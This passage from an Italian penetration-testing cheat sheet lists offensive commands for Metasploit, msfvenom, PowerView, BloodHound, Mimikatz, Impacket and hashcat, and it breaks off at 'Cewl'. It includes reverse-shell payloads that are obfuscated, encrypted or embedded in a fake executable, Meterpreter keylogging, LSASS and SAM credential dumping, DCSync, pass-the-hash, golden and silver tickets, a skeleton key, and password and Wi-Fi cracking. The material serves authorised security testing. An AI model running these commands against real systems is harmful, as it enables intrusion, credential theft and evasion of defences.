Ora prestiamo attenzione alla path "windows/remote/" perchè queste stesse cartelle andranno create nella directory "/usr/share/metasploit-framework/modules/exploits" quindi il risultato sarà "/usr/share/metasploit-framework/modules/exploits/windows/remote"; una volta create le directory andrà copiato lo script all'interno e avviato msfconole

sudo cp /usr/share/exploitdb/exploits/windows/remote/19231.rb /usr/share/metasploit-framework/modules/exploits/windows/remote/

msfconsole -m /usr/share/metasploit-framework/modules/

N.B: Metasploit utilizza solamente script in ruby ".rb"

Plugins:

I Pluging localizzatti in "/usr/share/metasploit-framework/plugins/" possono migliore e automatizzare dei processi, i plugin possono essere aggiunti manualmente da noi

Scripts:

Gli scrips li troviamo in "/usr/share/metasploit-framework/scripts/", tra cui "Meterpreter"

Tools:

Tool che si possono utilizzare con "msfconsole" si trovano in "/usr/share/metasploit-framework/tools/"

N.B: Appuntarsi almeno le path di ogni componente è importante se vogliamo aggiungere noi qualcosa manualmente

• Comandi Msfconsole:

sudo apt update && sudo apt install metasploit-framework #comando per installare metasploit

history #comando per vedere l'history dei comandi

show #comando per listare i moduli

sessions -i <num sessione> #comando per riprendere ad utilizzare una sessione in background

search <nome generico o path specifica> #comando per ricercare in un modulo 

ES: search exploit/unix/webapp/moinmoin_twikidraw o search moinmoin

use <path modulo o num della lista> #comando per utilizzare un modulo specifico

ES: use exploit/unix/webapp/moinmoin_twikidraw o use 1

info #comando che da informazioni sul modulo selezionato

show options #comando per vedere le opzioni da inserire nel modulo da utilizzare

show targets
set target <num target> #comando che funziona dopo aver selezionato un modulo, ci mostra i target affetti da un determinato exploit e ci permette di selezioarli

set <nome opzione> <valore opzione> #comando per settare l'opzione di un modulo selezionato

ES: set RHOSTS 1.1.1.1

unset all #comando per svuotare le varie opzioni settate

back #comando per uscire dal modulo selezionato e tornare alla msfconsole

exploit o run #comandi per avviare l'exploit o il modulo selezionato

• Comandi Meterpreter:

background #comando che una volta stabilita una sessione la manda in background permettendoci di svolgere altre operazioni

ps #comando per listare i processi sulla target machine

migrate <pid processo> #comando per migrare da un processo ad un altro

getuid #comando per sapere user corrente

keyscan_start keyscan_dump keyscan_stop #comandi per iniziare, scaricare il dump e fermare il keylogger in metasploit

shell #comando per avviare una shell

load kiwi #comando per avviare mimikatz

execute -f <powershell/cmd.exe> <cosa eseguire> #comando per eseguire comandi interni

• Comandi Payload:

msfvenom -a x64 -p windows/x64/exec CMD='<comando cmd>' -f <linguaggio> #comando per generare un payload che esegue un solo comando cmd

msfvenom -a x86 --platform Windows LHOST=<ip> LPORT=<porta> -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -b '<byte da escludere>' -i <num iterazione> -f <linguaggio> #comando che genera una revshell con obfuscazione

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<porta> -f exe --encrypt xor --encrypt-key "<chiave>" -o <nome eseguibile>.exe #comando per generare una revshell criptata

msfvenom -x <nome eseguibile falso>.exe -k -p windows/shell_reverse_tcp lhost=<ip> lport=<porta> -f exe -o <nome eseguibile>.exe #comando che genera una revshell all'interno di un finto eseguibile

• Comandi DB metasploit:

Metasploit permette di utilizzare un db locale per tenere traccia dei propri progressi durante un PT

sudo systemctl start postgresql
sudo service postgresql status #comandi per avviare e controllare lo stato del db

sudo apt update && sudo msfdb init #comando per avviare l'istanza di MSF database

sudo msfdb status #comando per controllare lo stato del MSF database

sudo msfdb run #comando per runnare MSF database

sudo msfdb reinit
cp /usr/share/metasploit-framework/config/database.yml ~/.msf4/
sudo service postgresql restart
msfconsole -q #versione compatta dei comandi per ristartare in fretta il db

help database #comando per aprire l'help del database

workspace #comando per listare le workspace nel db, le workspace sono simili a cartelle contenenti tutti i dati da noi inseriti

workspace -h #comando per aprire l'help delle workspace

workspace -a/-d <nome> #comando per aggiungere/rimuovere una workspace

db_import <nome file> #comando per importare un file nel db

db_nmap -sV -sS <ip> #comando per eseguire nmap ed importare i risultati nel db

db_export -h #comando per aprire l'help

db_export -f xml <nome file>.xml #comando per esportare dal db

hosts -h #comando per aprire l'help di hosts, da cui possiamo aggiungere host, hostnames

services -h #comando per aprire l'help dei servizi dove possiamo aggiungerli anche manualmente

creds -h #comando per aprire l'help delle creds dove possiamo anche aggiungerle manualmente

loot -h #comando per aprire l'help di loot, il quale ci da una panoramica delle informazioni recuperate

• Comandi Reverse/Port forwarding e pivoting:

Viene scritta una piccola sezione di questi comandi perchè sono ricollegabili alla sezione di Port Forwarding

use auxiliary/server/socks_proxy #comando che usa il modulo socks_proxy
set SRVPORT 9050 #campo per indicare la porta 
set SRVHOST 0.0.0.0 #campo per indicare indirizzo ip 
set version 4a #campo che indica la versione
run #comando per avviare il modulo

N.B: Prestare attenzione alla versione selezionata nel modulo socks_proxy deve coincidere con quella nel file /etc/proxychains.conf

use post/multi/manage/autoroute #comando che avvia il modulo autorute, per impostare le route
set sesssions 1 #campo che indica la sessione da utilizzare
set SUBNET <ip> #campo che indica la subnet 
run #comando per avviare il modulo

run autoroute -s <ip route> #comando alternativo per aggiungere manualmente una route, lanciato da meterpreter
run autoroute -p #comando che lista la routing table, lanciato da meterpreter

help portfwd #comando che runnato in msfoconsole apre l'help per il portfwd
portfwd add -l <porta locale> -p <porta remota> -r <ip remoto> #comando che binda la porta locale a quella remota, lanciato da meterpreter
portfwd add -R -l <porta locale> -p <porta remota> -L <ip remoto> #comando utilizzato per una reverse shell via port forwarding e binda la porta locale a quella lanciato da meterpreter 
remota poi una volta attivata la revshell che andrà a puntare prima alla porta remota che poi tramite forward arriverà alla nostra macchina

ES: portfwd add -l 3300 -p 3389 -r 192.168.9.1

freerdp /v:localhost:3300 /u:user /p:password

Ulteriore sottosezione con dei moduli utili per il pivoting e la scansione delle reti

run post/multi/gather/ping_sweep RHOSTS=<ip> #comando utile per la scansione di host tramite il comando ping, lanciato da meterpreter

ES: run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/24

N.B: Prestare attenzione ai bit dedicati agli utenti nella subnet

Powerview, facente parte del framework Powersploit è uno script molto utile nella fase di recognition ed enumerazione

Comando per scaricare PowerView.ps1 sulla macchina e avviarlo:

Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1
powershell -ep bypass
. .\PowerView.ps1

dopo aver avviato powerview abbiamo a disposizione dei comandi aggiuntivi per un'enumerazione completa della macchina vittima:

Get-NetUser #comando che ottiene le informazioni sugli utenti

Get-NetUser | select cn #comando per ottenere solo il common name

Get-NetUser -TrustedToAuth #comando per ottenere gli utenti che possono autenticarsi tramite trust o delegation

Get-NetGroup #comando che ottiene tutti i gruppi presenti a dominio

Get-NetGroup -GroupName *admin* #comando che ottiene tutti i gruppi in cui è presente la parola admin

Invoke-ShareFinder #comando che ottiene tutte le shares smb del dominio

Get-NetComputer -FullData #comando che ottiene tutte le informazioni su tutti i pc della rete

Get-NetComputer -FullData | Select-Object logoncount #comando per ridurre l'output da parsare selezioniamo l'oggetto specifico come in questo caso per gli accessi 

Get-DomainUser -Identity <sam account> | Get-DomainSPNTicket -Format Hashcat #comando per recuperare hash account SPN

Add-DomainObjectAcl -targetidentity "DC=<subdomain>, DC=<top_level_domain>" -principalidentity <nome_utente> -Rights DCSync -verbose 
#comando per aggiungere un oggetto alle ACL

Sopra vengono riportati i comandi utilizzati più di frequente, per una visione più completa dei comandi andare qui.

Bloodhound è un tool che permette l'organizzazione delle informazioni ottenute dalla fase di recognition del'AD per utilizzarlo avremmo bisogno di due tools: bloodhound

sudo apt install docker-compose #comando per installare docker-compose

curl -o docker-compose.yml https://raw.githubusercontent.com/SpecterOps/bloodhound/main/examples/docker-compose/docker-compose.yml && sudo docker-compose -f docker-compose.yml up #comando per scaricare e avviare il docker di bloodhund

Una volta avviato navighiamo all'indirizzo "http://localhost:8080/ui/login" con le credenziali admin:password generata dall'output del docker quando viene avviato, una volta entrati dobbiamo modificare la password con una nostra nuova

• Sharphound:

Sharphound, script .ps1 o eseguibile che vanno caricati sulla target machine che servirannò a mappare l'AD target:

Comandi del .ps1:

. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -OutputDirectory "<Path della cartella dove salvare lo zip>" #comando per salvare il .zip

Comandi del .exe:

. .\SharpHound.exe #comando per avviare l'eseguibile di sharphound

Una volta generato il .zip, lo trasferiamo nella nostra macchina e lo unzippiamo ed infine per caricalo andiamo in "Settings-> Administration-> File Ingest-> Upload files"

Allegati qui abbiamo i 2 eseguibili che hanno il compito di raccogliere i dati per Bloodhund e sono:

• SharpHound, utilizzato per l'AD

• AzureHound, utilizzato per il cloud Azure

N.B: Possiamo scaricare entrambi i collectors nella sezione "Settings-> Download Collectors"

Mimikatz è utilizzato per recuperare hash, password, recupero e creazione di ticket kerberos, per scaricalo andare qui.

Consigliamo di utilizzare mimikatz integrato con meterpreter per una maggiore praticità.

N.B: Alcuni di questi comandi richiedono che venga disattivato LSA del LSASS.

Comandi:

privilege::debug #comando per assicurarsi di runnare mimikatz come amministratore

token::elevate #comando che tenta di elevare i privilegi

lsadump::lsa /patch #comando per recupere NTLM hash

lsadump::sam #comando che tenta il dump del SAM

lsadump::dcsync /domain:<nome dominio> /all #comando che esegue il dcsync attack su tutti gli utenti

sekurlsa::pth /user:<nome utente> /domain:<nome dominio> /ntlm:<ntlm hash> #comando per eseguire il pass-the-hash

sekurlsa::logonpasswords #comando che tenta di recuperare le password in cache

sekurlsa::credman #comando che tenta di recuperare le password dal credmanager

sekurlsa::tickets /export #comando per esportare i .kirbi tickets e li recupera da LSASS memoria

sekurlsa::ekeys #comando che tenta di recuperare le kerberos keys e le password annesse

sekurlsa::minidump lsass.dmp #comando che se abbiamo la possibilità di dumpare LSASS permette di recuperare le password da esso

misc::cmd #comando per aprire un cmd 

kerberos::list #comando per listare i ticket kerberos nel sistema

kerberos::ptt <ticket> #comando per fare il pass the ticket

log <nome file>.txt #comando per creare un file di log

Golden ticket si ha accesso a tutti i servizi del kerberos.

kerberos::golden /user: /domain: /sid:<sid utente> /krbtgt:<NTLM utente> /id:<id utente> #comando per creare un golden ticket

kerberos::golden /admin:<nome admin> /domain:<dominio> /id:<id> /sid:<sid utente> /krbtgt:<NTLM hash> /endin:<minuti durata del ticket> /renewmax:<minuti per il rinnovo del ticket> /ptt #comando che crea sempre un golden ticket ma più completo di varie opzioni

Silver ticket si ha accesso ad un servizio del kerberos è più silenzioso del golden.

kerberos::golden /user: /domain: /sid:<sid servizio> /krbtgt:<NTLM servizio> /id:<id servizio> #comando per creare un silver ticket

kerberos::golden /admin:<nome admin> /domain:<dominio> /id:<id> /sid:<sid servizio> /target:<hostname del dominio> /rc4:>NTLM hash> /service:<servizio> esempio CIFS /ptt #comando che crea sempre un 	 
silver ticket ma più completo di varie opzioni

Comandi per creare la skeleton key

!+ #comando mimikatz che importa mimidrv.sys

!processprotect /process:lsass.exe /remove #comando per disattivare la protezione del LSA

misc::skeleton #comando per creare la skeleton key

!- #comando per rimuovere mimidrv.sys

Comandi per i certificati AD

crypto::certificates /systemstore:local_machine #comando per la verifica di certificati nella local machine

crypto::capi #comando che utilizza la API CryptoAPI per delle modifiche

crypto::cng #comando che modifica il KeyIso di windows

crypto::certificates /systemstore:local_machine /export #comando per esportare il certificato

_Variante in powershell:

Esiste disponibile anche la variante scritta in powershell

Impacket è una suite di script in python molto utili per il pentesting dell'AD, qui di seguito ne vengono presentati e spiegati alcuni

sudo pip3 install pipx
python3 -m pipx install impacket

GetUserSPNs.py #comando che sfrutta la vulnerabilità di kerberoasting per ottenere gli SPN(Service Principal Name) dei vari servizi, servono credenziali valide

ES:

GetUserSPNs.py -dc-ip <ip> <dominio>/<utente>

GetUserSPNs.py -dc-ip <ip> <dominio>/<utente> -request-user <utente>

GetUserSPNs.py -dc-ip <ip> <dominio>/<utente> -hashes <hash> -request-user <utente>

GetUserSPNs.py <nome dominio>/ -usersfile users.txt

GetNPUsers.py #comando che sfrutta la misconfigurazione di utenti che non hanno settata la flag UF_DONT_REQUIRE_PREAUTH del kerberos cioè autenticarsi senza richiedere la password

ES:

GetNPUsers.py <nome dominio>/<nome account> -no-pass

GetNPUsers.py <nome dominio>/ -usersfile users.txt

secretsdump.py #comando che recupera le credenziali dal System, Sam e ntds.dit

ES:

secretsdump.py -dc-ip <ip_del_domain_controller> <nome_account>:<passoword>@<ip_domain_controller>

secretsdump.py -sam sam.bak -system system.bak LOCAL

secretsdump.py -just-dc <dominio>/<utente>@<ip domain controller>

ntlmrelayx.py #comando utilizzato per condurre attacchi di tipo relay 

ES:

ntlmrelayx.pyx -6 -t ldaps://<ip_target> -wh wpad.<dominio> -l <directory dove salvare>

ntlmrelayx.pyx -t ldaps://<ip> <dominio>/<utente> --dump-laps

addcomputer.py #comando per aggiungere un computer a dominio

ES: addcomputer.py -dc-ip <domain controller ip> -computer-name <nome computer> -computer-pass '<password>' <nome tdl dominio>:<username>:<password>

smbserver.py #comando per startar un smb server

ES: smbserver.py <Nomeshare da inserire nel comando di upload> -smb2support <share locale che condividi>

mssqlclient.py #comando per connettersi ad un db

ES:

mssqlclient.py <nome utente sql>@<ip> -windows-auth

help

enable xp_cmdshell

xp_cmdshell whoami /priv

exchanger.py #comando per connettersi ad un windows exchange

ES: exchanger.py <dominio>/<nome utente>:"<password>"@<mail> nspi list-tables

samrdump.py #comando che tramite il samr (Security Account Manager Remote) named pipe tenta di recuperare delle informazioni

ES: samrdump.py <ip>

smbpasswd.py #comando che da remota cambia la password di un account

ES: smbpasswd.py <dominio>/<utente target>:<password vecchia>@<ip> -newpass <nuova password>

rpcdump.py #comando per dumpare le informazioni dal protocollo RPC

ES: rpcdump.py -port 135 <ip>

gMSADumper.py #comando che dumpa le credenziali gMSA

ES: gMSADumper.py -u <nome utente> -p <password> -d <dominio>

DumpNTLMInfo.py #comando per recuperare informazioni relative agli NTLM hash

ES: DumpNTLMInfo.py <dominio>/nome utente>:'<password>'@'<ip>'

findDelegation.py #comando che passando in input credenziali permette di visionare le kerberos delegation

ES: findDelegation.py <dominio>/<user>:<password>

atexec.py #comando che permette di creare ed eseguire immediatamente un task schedulato via SMB

ES: atexec.py <dominio>/nome utente>:'<password>'@'<ip>' <comando da eseguire>

psexec.py #comando simile a psexec della suitesysinternal che permette di inviare comandi da remoto

ES: psexec.py <dominio>/<nome utente>:'<password>'@<ip>

wmiexec.py #comando che si connette tramite wmi, crea una shell semi-interattiva e a livello di log causa poco rumore

ES: wmiexec.py <dominio>/<nome utente>:'<password>'@<ip>

dcomexec.py #comando che permette l'esecuzione di ulteriori comandi da remoto tramite il protocollo dcom

ES: dcomexec.py -object 'MMC20' <dominio>/<utente>:<password>@<ip_target> '<comando>' -nooutput

Hashcat è il più famoso tool di cracking per le password, può essere scaricato qui

Comandi generali:

sudo apt install hashcat #comando per installare hashcat

hashcat -h #comando per aprire l'help di hashcat

hashcat <nome file hash> #comando per far partire l'autorilevamento di hash del tool

hashcat --example-hashes #comando per aprire gli esempi di hashes

hashcat -b -m <num hash> #comando per attivare il benchmark su un tipo di hash

hashcat.potfile #path file dove vengono salvati gli hash craccati

Link agli hashcat-utils, bianri che possono ampliare l'utilizzo di hashcat

1. Attacco a dizionario:

L'attacco a dizionario (num 0) consiste nel provare tutte le password provenienti da una wordlist, le più famose sono la Seclists o Rockyou

Comandi:

hashcat -a 0 -m <num hash> <file hash> <wordlist di password> #comando che avvia l'attacco a dizionario, la flag "-a" indica il tipo di attacco

2. Attacco combinato:

L'attacco combinato (num 1) è composto da due wordlist di password che vengono poi combinate insieme per eseguire un attacco a dizionario

Comandi:

hashcat -a 1 -m <num hash> <file hash> <wordlist di password num 1> <wordlist di password 2> #comando che avvia l'attacco combinato

3. Attacco a forza bruta:

L'attacco a forza bruta (num 3) consiste nel provare tutte le combinazioni possibili finchè non ritorna l'hash esatto, questo attacco diviene nullo se la password è lunga di molti caratteri, una metodologia per ridurre i tentavi è l'aggiunta della maschera, consiste nel creare una propria pattern di caratteri per poter craccare al meglio una password, utilizzando un proprio set si va a diminuire drasticamente il numero totale di possibili tentavi

Tabella con i caratteri per l'attacco a maschera:

?u: Lettere maiuscole ASCII (A-Z)

?l: Lettere minuscole ASCII (a-z)

?h: Caratteri esadecimali minuscoli (0123456789abcdef)

?s: Caratteri speciali («spazio»!"#$%&'()*+,-./:;<=>?@[]^_{`)

?H: Caratteri esadecimali maiuscoli (0123456789ABCDEF)

?b: Tutti i byte da 0x00 a 0xff (256 possibili byte)

?d: Cifre (0-9)

ES: Password da craccare = Abete2022 -----> Maschera creata = ?u?l?l?l?l?d?d?d?d

N.B: Nell'esempio di sopra per fare capire il concetto viene utilizzata una password molto semplice ma non sempre sarà cosi

Comandi:

hashcat -a 3 -m <num hash> <file hash> <num charset che va da 1 a 4> <charset> <pattern della maschera scelta> #comando per avviare l'attacco a maschera

ES: hashcat -m 0 -a 3 hash -1 01 'HELLO?l?l?l?l20?1?d'

4. Attacco Ibrido:

L'attacco ibrido "(num 6-7)" consiste nell'insieme di utilizzare altri tipi di attacchi in un unico

Comandi:

hashcat -a 6 -m <num hash> <hash> <wordlist password> <pattern della maschera scelta> #comando 6 che combina attacco a dizionario con attacco a maschera

hashcat -a 7 -m <num hash> <hash> <pattern della maschera scelta <wordlist password> #comando 6 che combina attacco a dizionario con attacco a maschera

5. Attacco con le regole:

L'attacco con le regole è uno dei più avanzati in quanto a seconda del pattern scelto andremo ad applicare delle modifiche alla wordlist iniziale la quale in seguito ci ritornerà un'output diverso

Tabella delle funzioni:

l: Converti tutte le lettere in minuscolo.
u: Converti tutte le lettere in maiuscolo.
r: Inverte il testo.
c / C: Capitalizza la prima lettera e converte le altre in minuscolo / converte la prima lettera in minuscolo e le altre in maiuscolo.
{ / }: Ruota la parola a sinistra / destra.
d / q / zN / ZN: Duplica la parola / tutti i caratteri / primo carattere / ultimo carattere / N caratteri dalla parola.
^X / $X: Aggiungi il carattere X all'inizio / alla fine del testo.
t / TN: Cambia il caso di tutta la parola / alla posizione N nella parola (dove la prima posizione è 1).

N.B: La lista completa è disponibile qui

Comandi:

echo '<set regole>' > rule.txt #comando per creare le regole e salvare in un txt

hashcat -a 0 -m <num hash> <nome file hash> <wordlist password> -r <file regole> #comando per avviare l'attacco con le regole

hashcat -a 0 -m <num hash> -g <numero regole casuali> <nome file hash> <path file wordlist> #comando per applicare regole randomiche

ls -l /usr/share/hashcat/rules/ #comando per listare le regole di default per hashcat

Link a risorse:

Link per recuperare altre regole da utilizzare con hashcat

NSA-Rules

Corporate.rule

6. Cracking Wifi:

Hashcat permette di craccare anche le password delle wifi

N.B: l'attacco richieda che venga catturato l'handshake in un packet capture

Comandi cracking MIC (Message Integrity Check):

Il pcap catturato va convertito in un formato leggibile da Hashcat o utilizziamo il seguente sito o scarichiamo il tool

git clone https://github.com/hashcat/hashcat-utils.git
cd hashcat-utils/src
make #comandi per installare la util

./cap2hccapx.bin <file pacchetti catturati>.cap <file per hashcat>.hccapx #comando per convertirlo in formato hccapx

hashcat -a 0 -m 22000 <file>.hccapx <file wordlist> #comando per craccare la password con attacco a forza bruta

Comandi cracking PMKID (Pairwise Master Key Identifier)

Questa metodologia richiede che venga sempre catturata la PMKID in un packet capture e poi convertito in un formato comprensibile ad hashcat

git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make && make install #comandi per insttalre in tool hcxpcapngtool

hcxpcapngtool <file pacchetti catturati>.cap -o <file per hashcat> #comandi per convertire il .cap

hashcat -a 0 -m 22000 <file>.hccapx <file wordlist> #comando per craccare la password con attacco a forza bruta

Il saper creare le wordlists è molto importante questa sezione oltre a focalizzarsi in wordlists di password ci saranno scritti anche tool/script per generare liste di usernames

• Crunch:

Crunch permette di generare delle password definendo lunghezza minima, massima e pattern da applicare

Comandi:

crunch <lunghezza minima> <lunghezza massima> <pattern % indica numeri @ indica lettere> -o <nome file output> #comando completo per generare una wordlist con crunch

• Cupp:

Cupp altro tool per generare una wordlist ma permette di farlo in maniera più precisa su un determinato utente, in quanto lo stesso tool chiederà domande specifiche dello user target al fine di creare una lista più completa possibile

Comandi:

cupp -i #comando per startare cupp, andrà data una risposta alle sue domande per generare la wordlist

• Kwprocessor:

Kwprocessor, il seguente tool genera delle wordlists seguendo l'idea di "camminare sulla tastiera", cioè un utente che per creare una sua password abbia semplicemente premuto tasti a caso su di essa

Comandi:

git clone https://github.com/hashcat/kwprocessor
cd kwprocessor
make #comandi per installare e settare il tool

/kwp -s <numeri shift> basechars/<base di caratteri da utilizzare> keymaps/<layout tastiera> routes/<pattern da seguire> #comando per settare Kwprocessor

N.B: Maggiori Info andare qui

• PrinceProcessor:

Il tool PrinceProcessor genera una wordlist combinata cioè gli viene passata una lista di password singole e il tool le combina insieme

Comandi:

wget https://github.com/hashcat/princeprocessor/releases/download/v0.22/princeprocessor-0.22.7z
7z x princeprocessor-0.22.7z
cd princeprocessor-0.22
./pp64.bin -h #comandi per installare il tool

./pp64.bin --pw-min=<num minimo lunghezza> --pw-max=<numero massimo lunghezza> -o <nome file output> <wordlist input> #comando per generare la wordlist

• Namemash:

script in python che genera una lista di usernames utilizzando nome e cognome, è scaricabile qui

Comandi:

namemash.py <nome file>.txt >> <nome file dove salvare>.txt #comando per utilizzare Namemash

• Cewl: